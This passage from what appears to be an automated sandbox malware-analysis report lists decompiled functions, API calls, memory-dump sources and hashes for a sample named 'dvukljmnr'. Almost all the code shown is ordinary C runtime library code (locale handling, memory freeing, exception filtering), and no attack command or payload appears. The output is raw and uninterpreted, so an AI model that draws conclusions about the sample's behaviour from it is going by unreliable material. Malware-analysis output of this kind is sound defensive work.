                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,009B155A,009CF548,Microsoft Visual C++ Runtime Library,00012010), ref: 009B58D8
                                                          • OutputDebugStringW.KERNEL32(?,?,?,?,?,?,009B155A,009CF548,Microsoft Visual C++ Runtime Library,00012010), ref: 009B58EA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: AddressEncodePointerProc$DebugDebuggerErrorLastLibraryLoadOutputPresentString
                                                          • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
                                                          • API String ID: 1496758939-564504941
                                                          • Opcode ID: 45f169737ef8c58d1512ab8f110e1a217ef395b1685af0bc58588c4e790b06f7
                                                          • Instruction ID: c2a79641d0d773efffa66813ec8f0434c84026bd56148b6f04e428cfa15ca33c
                                                          • Opcode Fuzzy Hash: 45f169737ef8c58d1512ab8f110e1a217ef395b1685af0bc58588c4e790b06f7
                                                          • Instruction Fuzzy Hash: C211E470E1D302EBCB019BB1AD4CF6BBBBCAE857253550469F816D21A1DF34C800DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009BE8C3 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E009BE8C3(short _a4, intOrPtr _a8) {
				short _t13;
				short _t28;

				_t28 = _a4;
				if(_t28 != 0 &&  *_t28 != 0 && E009BDB28(_t28, ?str?) != 0) {
					if(E009BDB28(_t28, ?str?) != 0) {
						return E009BEFC5(_t28);
					}
					if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_a4, 2) == 0) {
						L9:
						return 0;
					}
					return _a4;
				}
				if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_a4, 2) == 0) {
					goto L9;
				}
				_t13 = _a4;
				if(_t13 == 0) {
					return GetACP();
				}
				return _t13;
			}





                                                          0x009be8c7
                                                          0x009be8cc
                                                          0x009be8f4
                                                          0x00000000
                                                          0x009be91d
                                                          0x009be90f
                                                          0x009be93b
                                                          0x00000000
                                                          0x009be93b
                                                          0x00000000
                                                          0x009be911
                                                          0x009be939
                                                          0x00000000
                                                          0x00000000
                                                          0x009be93f
                                                          0x009be944
                                                          0x009be948
                                                          0x009be948
                                                          0x009be916

                                                          APIs
                                                          • _wcscmp.LIBCMT ref: 009BE8DA
                                                          • _wcscmp.LIBCMT ref: 009BE8EB
                                                          • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,009BEB89,?,00000000), ref: 009BE907
                                                          • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,009BEB89,?,00000000), ref: 009BE931
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: InfoLocale_wcscmp
                                                          • String ID: ACP$OCP
                                                          • API String ID: 1351282208-711371036
                                                          • Opcode ID: 5949c4be9a372e0b2fdcc68f0d61febfa371dc78f9639f4dc46e1ea0f8070724
                                                          • Instruction ID: a98c23c952848ed0f01ce3e33c39dce27c8b2c164c49f25d784f8634b24c9acf
                                                          • Opcode Fuzzy Hash: 5949c4be9a372e0b2fdcc68f0d61febfa371dc78f9639f4dc46e1ea0f8070724
                                                          • Instruction Fuzzy Hash: 66012832209215BAEB549F94DD41FEA37DCDF04774F004415F909DA191E730EE84C791
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009B1D88 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E009B1D88(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				return UnhandledExceptionFilter(_a4);
			}



                                                          0x009b1d8d
                                                          0x009b1d9d

                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32 ref: 009B1D8D
                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 009B1D96
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          • Opcode ID: 28f0b4d89dd40ddfa5de9adc1b4986db5ec6369e0b8b8deb078cb485f9a42f8c
                                                          • Instruction ID: fabb716a9a294322956cb9b6d64de8c30a2161e3f294e64d8e0c5605529fb6e4
                                                          • Opcode Fuzzy Hash: 28f0b4d89dd40ddfa5de9adc1b4986db5ec6369e0b8b8deb078cb485f9a42f8c
                                                          • Instruction Fuzzy Hash: 9BB0923145C208ABCB002BD2EC09F4CBF28EB06652F081090FA0D440608B625410AFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009B9F55 Relevance: 1.5, APIs: 1, Instructions: 20COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          C-Code - Quality: 25%
                                                          			E009B9F55(intOrPtr* __ebx, void* __edx, void* __fp0, signed int _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t5;
				intOrPtr* _t6;
				int _t8;

				_t5 =  *0x9d00d8; // 0x8a1365f9
				asm("popfd");
				 *__ebx =  *__ebx + __edx;
				_t6 = _t5 + 0x9ce400;
				if(_t6 == 0) {
					 *0x9d005c = _a4;
					_t8 = EnumSystemLocalesW(E009B9F41, 1);
					 *0x9d005c =  *0x9d005c & 0x00000000;
					return _t8;
				} else {
					return  *_t6(_a4, _a8, _a12, 0);
				}
			}






                                                          0x009b9f58
                                                          0x009b9f5b
                                                          0x009b9f5c
                                                          0x009b9f5e
                                                          0x009b9f63
                                                          0x009b9f7e
                                                          0x009b9f83
                                                          0x009b9f89
                                                          0x009b9f91
                                                          0x009b9f65
                                                          0x009b9f73
                                                          0x009b9f73

                                                          APIs
                                                          • EnumSystemLocalesW.KERNEL32(009B9F41,00000001,?,009BDCDD,009BDD7B,00000003,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 009B9F83
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: EnumLocalesSystem
                                                          • String ID:
                                                          • API String ID: 2099609381-0
                                                          • Opcode ID: 409d874ea4bd927a05da2e5726671dcd293e51e0dec7f2c557dd8213a79d0311
                                                          • Instruction ID: 5cfa00c00dcb62df3b402a8085eb711e0a90bbc92de7d9b4d1de1bba706b8c5b
                                                          • Opcode Fuzzy Hash: 409d874ea4bd927a05da2e5726671dcd293e51e0dec7f2c557dd8213a79d0311
                                                          • Instruction Fuzzy Hash: 2CE04F315A8208FFCB01CF90EC05FA437A5A744724F004401B6088A160C271A890EF14
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009B9FDB Relevance: 1.5, APIs: 1, Instructions: 18COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,00000002,?,?,009B4E67,?,?,?,00000002), ref: 009BA002
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: InfoLocale
                                                          • String ID:
                                                          • API String ID: 2299586839-0
                                                          • Opcode ID: dfc0c408890099720cbd2a6cd8ffcdc9655a4e3df684be82ae246f771598025d
                                                          • Instruction ID: 82e9cab9866c0d7116657ff88176bac69d0366faaf0bdfa0f0c7160e17b07c66
                                                          • Opcode Fuzzy Hash: dfc0c408890099720cbd2a6cd8ffcdc9655a4e3df684be82ae246f771598025d
                                                          • Instruction Fuzzy Hash: 3AD06736468109BFCF019FE0ED49DBA3B69FB48365B444845FA1D86120D632A960AB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000F061D Relevance: .1, Instructions: 77COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923103102.00000000000F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_f0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 123e22cade36a5f7e84e6f32991f11fb2643e9023da6a48d7aaeea9cc29c5119
                                                          • Instruction ID: ecb67a63cf7f726b9b688b4885da3af1caf9d32890d2a985f300258229efbeaf
                                                          • Opcode Fuzzy Hash: 123e22cade36a5f7e84e6f32991f11fb2643e9023da6a48d7aaeea9cc29c5119
                                                          • Instruction Fuzzy Hash: 1C218E36B00218AFDB10DFA9C8809BDF7F5EF98354B14846AE582D3362E674DE00DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000F0736 Relevance: .0, Instructions: 26COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923103102.00000000000F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_f0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 64c80a6db38535584993776924430328fc228a3310808f0bb0e95da0b1c4f32f
                                                          • Instruction ID: 0181c01b45fc7bb278b0e769598d8b4ff059d689466f4056a719c087c1794006
                                                          • Opcode Fuzzy Hash: 64c80a6db38535584993776924430328fc228a3310808f0bb0e95da0b1c4f32f
                                                          • Instruction Fuzzy Hash: 83E01A35764A4A9FCB04DBB8C981D59B3E4EB48368B144294F916C77E2EA78FD00EA50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000F0772 Relevance: .0, Instructions: 23COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923103102.00000000000F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_f0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 055fc2369cb3b2bc554ae43ce053feaa5be1087eab72588a8dd43b31cd325cde
                                                          • Instruction ID: eab8232e16769c29b79342079a2d08c43833b5089bee5626c611cf61d4107c28
                                                          • Opcode Fuzzy Hash: 055fc2369cb3b2bc554ae43ce053feaa5be1087eab72588a8dd43b31cd325cde
                                                          • Instruction Fuzzy Hash: 2BE086367146148BD760EA19C484967F3E9EBC83B071548A9EA46D3B12C230FC009A90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 000F06F7 Relevance: .0, Instructions: 7COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923103102.00000000000F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_f0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                          • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                                                          • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                          • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009B842D Relevance: 19.6, APIs: 13, Instructions: 87COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E009B842D(intOrPtr _a4) {
				intOrPtr _t15;
				intOrPtr _t54;
				void* _t56;
				void* _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				void* _t61;
				void* _t62;
				void* _t63;
				void* _t64;
				void* _t65;
				void* _t66;
				void* _t67;
				void* _t68;

				_t54 = _a4;
				if(_t54 != 0) {
					_t2 = _t54 + 0xc; // 0xf000000
					_t56 =  *_t2 -  *0x9cee34; // 0x9d0054
					if(_t56 != 0) {
						E009B2248(_t16);
					}
					_t3 = _t54 + 0x10; // 0x254804b7
					_t57 =  *_t3 -  *0x9cee38; // 0x9d0054
					if(_t57 != 0) {
						E009B2248(_t17);
					}
					_t4 = _t54 + 0x14; // 0x8000
					_t58 =  *_t4 -  *0x9cee3c; // 0x9d0054
					if(_t58 != 0) {
						E009B2248(_t18);
					}
					_t5 = _t54 + 0x18; // 0xfc7d80
					_t59 =  *_t5 -  *0x9cee40; // 0x9d0054
					if(_t59 != 0) {
						E009B2248(_t19);
					}
					_t6 = _t54 + 0x1c; // 0x4d8b0774
					_t60 =  *_t6 -  *0x9cee44; // 0x9d0054
					if(_t60 != 0) {
						E009B2248(_t20);
					}
					_t7 = _t54 + 0x20; // 0x706183f8
					_t61 =  *_t7 -  *0x9cee48; // 0x9d0054
					if(_t61 != 0) {
						E009B2248(_t21);
					}
					_t8 = _t54 + 0x24; // 0x5de58bfd
					_t62 =  *_t8 -  *0x9cee4c; // 0x9d0054
					if(_t62 != 0) {
						E009B2248(_t22);
					}
					_t9 = _t54 + 0x38; // 0x5d595900
					_t63 =  *_t9 -  *0x9cee60; // 0x9d0058
					if(_t63 != 0) {
						E009B2248(_t23);
					}
					_t10 = _t54 + 0x3c; // 0xec8b55c3
					_t64 =  *_t10 -  *0x9cee64; // 0x9d0058
					if(_t64 != 0) {
						E009B2248(_t24);
					}
					_t11 = _t54 + 0x40; // 0x10368
					_t65 =  *_t11 -  *0x9cee68; // 0x9d0058
					if(_t65 != 0) {
						E009B2248(_t25);
					}
					_t12 = _t54 + 0x44; // 0x875ff00
					_t66 =  *_t12 -  *0x9cee6c; // 0x9d0058
					if(_t66 != 0) {
						E009B2248(_t26);
					}
					_t13 = _t54 + 0x48; // 0x401e8
					_t67 =  *_t13 -  *0x9cee70; // 0x9d0058
					if(_t67 != 0) {
						E009B2248(_t27);
					}
					_t14 = _t54 + 0x4c; // 0x5d595900
					_t15 =  *_t14;
					_t68 = _t15 -  *0x9cee74; // 0x9d0058
					if(_t68 != 0) {
						return E009B2248(_t15);
					}
				}
				return _t15;
			}


















                                                          0x009b8431
                                                          0x009b8436
                                                          0x009b843c
                                                          0x009b843f
                                                          0x009b8445
                                                          0x009b8448
                                                          0x009b844d
                                                          0x009b844e
                                                          0x009b8451
                                                          0x009b8457
                                                          0x009b845a
                                                          0x009b845f
                                                          0x009b8460
                                                          0x009b8463
                                                          0x009b8469
                                                          0x009b846c
                                                          0x009b8471
                                                          0x009b8472
                                                          0x009b8475
                                                          0x009b847b
                                                          0x009b847e
                                                          0x009b8483
                                                          0x009b8484
                                                          0x009b8487
                                                          0x009b848d
                                                          0x009b8490
                                                          0x009b8495
                                                          0x009b8496
                                                          0x009b8499
                                                          0x009b849f
                                                          0x009b84a2
                                                          0x009b84a7
                                                          0x009b84a8
                                                          0x009b84ab
                                                          0x009b84b1
                                                          0x009b84b4
                                                          0x009b84b9
                                                          0x009b84ba
                                                          0x009b84bd
                                                          0x009b84c3
                                                          0x009b84c6
                                                          0x009b84cb
                                                          0x009b84cc
                                                          0x009b84cf
                                                          0x009b84d5
                                                          0x009b84d8
                                                          0x009b84dd
                                                          0x009b84de
                                                          0x009b84e1
                                                          0x009b84e7
                                                          0x009b84ea
                                                          0x009b84ef
                                                          0x009b84f0
                                                          0x009b84f3
                                                          0x009b84f9
                                                          0x009b84fc
                                                          0x009b8501
                                                          0x009b8502
                                                          0x009b8505
                                                          0x009b850b
                                                          0x009b850e
                                                          0x009b8513
                                                          0x009b8514
                                                          0x009b8514
                                                          0x009b8517
                                                          0x009b851d
                                                          0x00000000
                                                          0x009b8525
                                                          0x009b851d
                                                          0x009b8528

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: d88377a96474bbc85065ef84bcc1def7e784c387f8730ae7e200345f44237eb1
                                                          • Instruction ID: 057f278e9541268213c1a9db557a34ad7a81df57b44167fe861174edcd1da78a
                                                          • Opcode Fuzzy Hash: d88377a96474bbc85065ef84bcc1def7e784c387f8730ae7e200345f44237eb1
                                                          • Instruction Fuzzy Hash: 6C213532954604ABC628EB64FE85D9773EEEA083707A44D09F11AD7561CF74FC808625
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009B7973 Relevance: 19.6, APIs: 13, Instructions: 84COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          C-Code - Quality: 77%
                                                          			E009B7973(void* __ebx, void* __edx, void* __fp0, intOrPtr _a4, intOrPtr _a8) {
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t15;
				intOrPtr _t22;
				intOrPtr* _t42;

				if(_a4 > 5 || _a8 == 0) {
					L4:
					return 0;
				} else {
					_t42 = E009B2280(8, 1);
					if(_t42 != 0) {
						_t12 = E009B2280(0xb8, 1);
						 *_t42 = _t12;
						__eflags = _t12;
						if(_t12 != 0) {
							_t13 = E009B2280(0x220, 1);
							 *((intOrPtr*)(_t42 + 4)) = _t13;
							__eflags = _t13;
							if(_t13 != 0) {
								E009B7488( *_t42, 0x9ce800);
								_t15 = E009B7D73(__ebx, __edx, 1, _t42, __fp0,  *_t42, _a4, _a8);
								_push( *((intOrPtr*)(_t42 + 4)));
								__eflags = _t15;
								if(__eflags == 0) {
									L14:
									E009B2248();
									E009B4248( *_t42);
									E009B40EE( *_t42);
									E009B2248(_t42);
									_t42 = 0;
									L16:
									return _t42;
								}
								_push( *((intOrPtr*)( *_t42 + 4)));
								_t22 = E009B48E9(__edx, 1, __eflags);
								__eflags = _t22;
								if(_t22 == 0) {
									 *((intOrPtr*)( *((intOrPtr*)(_t42 + 4)))) = 1;
									goto L16;
								}
								_push( *((intOrPtr*)(_t42 + 4)));
								goto L14;
							}
							E009B2248( *_t42);
							E009B2248(_t42);
							L8:
							goto L3;
						}
						E009B2248(_t42);
						goto L8;
					}
					L3:
					 *((intOrPtr*)(E009AF100())) = 0xc;
					goto L4;
				}
			}











                                                          0x009b797c
                                                          0x009b79a2
                                                          0x00000000
                                                          0x009b7984
                                                          0x009b798f
                                                          0x009b7995
                                                          0x009b79ae
                                                          0x009b79b3
                                                          0x009b79b7
                                                          0x009b79b9
                                                          0x009b79ca
                                                          0x009b79cf
                                                          0x009b79d4
                                                          0x009b79d6
                                                          0x009b79ef
                                                          0x009b79fc
                                                          0x009b7a04
                                                          0x009b7a07
                                                          0x009b7a09
                                                          0x009b7a1e
                                                          0x009b7a1e
                                                          0x009b7a25
                                                          0x009b7a2c
                                                          0x009b7a32
                                                          0x009b7a3a
                                                          0x009b7a43
                                                          0x00000000
                                                          0x009b7a43
                                                          0x009b7a0d
                                                          0x009b7a10
                                                          0x009b7a17
                                                          0x009b7a19
                                                          0x009b7a41
                                                          0x00000000
                                                          0x009b7a41
                                                          0x009b7a1b
                                                          0x00000000
                                                          0x009b7a1b
                                                          0x009b79da
                                                          0x009b79e0
                                                          0x009b79c1
                                                          0x00000000
                                                          0x009b79c1
                                                          0x009b79bc
                                                          0x00000000
                                                          0x009b79bc
                                                          0x009b7997
                                                          0x009b799c
                                                          0x00000000
                                                          0x009b799c

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                                          • String ID:
                                                          • API String ID: 1503006713-0
                                                          • Opcode ID: 044e6a698d42caf234a8125fa7611d2aaad340f55c744e953543d501a151e4f2
                                                          • Instruction ID: 6dfbdb7a9998d7dbdf7fd9c75472369038a7ed211609ed7ea2d8b9231477365b
                                                          • Opcode Fuzzy Hash: 044e6a698d42caf234a8125fa7611d2aaad340f55c744e953543d501a151e4f2
                                                          • Instruction Fuzzy Hash: 0521053514C605AEEB253FE4DE02FDABBE9DFC1770B204A2DF554950A2EA3199009791
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009B7A4A Relevance: 18.1, APIs: 12, Instructions: 131COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          C-Code - Quality: 84%
                                                          			E009B7A4A(void* __ebx, void* __edx, void* __edi, void* __esi, void* __fp0, intOrPtr _a4, signed int _a8, char _a12) {
				signed int _v8;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				void* _t38;
				signed int _t45;
				signed int _t60;
				intOrPtr _t77;
				void* _t80;
				intOrPtr* _t82;
				signed int _t83;
				signed int _t86;
				intOrPtr _t88;
				void* _t92;
				void* _t98;

				_t98 = __fp0;
				_t80 = __edx;
				_push(__ebx);
				_push(__esi);
				_t86 = 0;
				if(_a12 <= 0) {
					L5:
					return _t38;
				} else {
					_push(__edi);
					_t82 =  &_a12;
					while(1) {
						_t82 = _t82 + 4;
						_t38 = E009B56BB(_a4, _a8,  *_t82);
						_t92 = _t92 + 0xc;
						if(_t38 != 0) {
							break;
						}
						_t86 = _t86 + 1;
						if(_t86 < _a12) {
							continue;
						} else {
							goto L5;
						}
						goto L20;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E009AEB49(0, _t80);
					asm("int3");
					_push(0x14);
					_push(0x9cc560);
					E009AF1E0(0, _t82, _t86);
					_t66 = 0;
					_v32 = 0;
					__eflags = _a4 - 5;
					if(_a4 <= 5) {
						_t88 = E009B0595();
						_v36 = _t88;
						E009B42E8(0, _t80, _t82, _t88, __eflags);
						 *(_t88 + 0x70) =  *(_t88 + 0x70) | 0x00000010;
						_v8 = _v8 & 0;
						_t83 = E009B2280(0xb8, 1);
						_v40 = _t83;
						__eflags = _t83;
						if(_t83 != 0) {
							E009B20A9(0xc);
							_v8 = 1;
							E009B7488(_t83,  *((intOrPtr*)(_t88 + 0x6c)));
							_v8 = _v8 & 0x00000000;
							E009B7BBF();
							_t66 = E009B7D73(0, _t80, _t83, _t88, _t98, _t83, _a4, _a8);
							_v32 = _t66;
							__eflags = _t66;
							if(_t66 == 0) {
								E009B4248(_t83);
								_t43 = E009B40EE(_t83);
							} else {
								__eflags = _a8;
								if(_a8 != 0) {
									_t60 = E009BDB28(_a8, 0x9ce694);
									__eflags = _t60;
									if(_t60 != 0) {
										 *0x9d0050 = 1;
									}
								}
								E009B20A9(0xc);
								_v8 = 2;
								_t25 = _t88 + 0x6c; // 0x6c
								E009B4368(_t25, _t83);
								E009B4248(_t83);
								__eflags =  *(_t88 + 0x70) & 0x00000002;
								if(( *(_t88 + 0x70) & 0x00000002) == 0) {
									__eflags =  *0x9cee10 & 0x00000001;
									if(( *0x9cee10 & 0x00000001) == 0) {
										E009B4368(0x9ce7fc,  *((intOrPtr*)(_t88 + 0x6c)));
										_t77 =  *0x9ce7fc; // 0x9ce800
										_t32 = _t77 + 0x84; // 0x9cee28
										 *0x9cee20 =  *_t32;
										_t33 = _t77 + 0x90; // 0x9c8760
										 *0x9cee7c =  *_t33;
										_t34 = _t77 + 0x74; // 0x1
										 *0x9ce690 =  *_t34;
									}
								}
								_v8 = _v8 & 0x00000000;
								_t43 = E009B7BCE();
							}
						}
						_v8 = 0xfffffffe;
						E009B7C01(_t43, _t88);
						_t45 = _t66;
					} else {
						 *((intOrPtr*)(E009AF100())) = 0x16;
						E009AEB1E();
						_t45 = 0;
					}
					return E009AF225(_t45);
				}
				L20:
			}


















                                                          0x009b7a4a
                                                          0x009b7a4a
                                                          0x009b7a4d
                                                          0x009b7a50
                                                          0x009b7a51
                                                          0x009b7a56
                                                          0x009b7a7a
                                                          0x009b7a7d
                                                          0x009b7a58
                                                          0x009b7a58
                                                          0x009b7a59
                                                          0x009b7a5c
                                                          0x009b7a5c
                                                          0x009b7a67
                                                          0x009b7a6c
                                                          0x009b7a71
                                                          0x00000000
                                                          0x00000000
                                                          0x009b7a73
                                                          0x009b7a77
                                                          0x00000000
                                                          0x009b7a79
                                                          0x00000000
                                                          0x009b7a79
                                                          0x00000000
                                                          0x009b7a77
                                                          0x009b7a7e
                                                          0x009b7a7f
                                                          0x009b7a80
                                                          0x009b7a81
                                                          0x009b7a82
                                                          0x009b7a83
                                                          0x009b7a88
                                                          0x009b7a89
                                                          0x009b7a8b
                                                          0x009b7a90
                                                          0x009b7a95
                                                          0x009b7a97
                                                          0x009b7a9a
                                                          0x009b7a9e
                                                          0x009b7abc
                                                          0x009b7abe
                                                          0x009b7ac1
                                                          0x009b7ac6
                                                          0x009b7aca
                                                          0x009b7adb
                                                          0x009b7add
                                                          0x009b7ae0
                                                          0x009b7ae2
                                                          0x009b7aea
                                                          0x009b7af0
                                                          0x009b7afb
                                                          0x009b7b02
                                                          0x009b7b06
                                                          0x009b7b1a
                                                          0x009b7b1c
                                                          0x009b7b1f
                                                          0x009b7b21
                                                          0x009b7bda
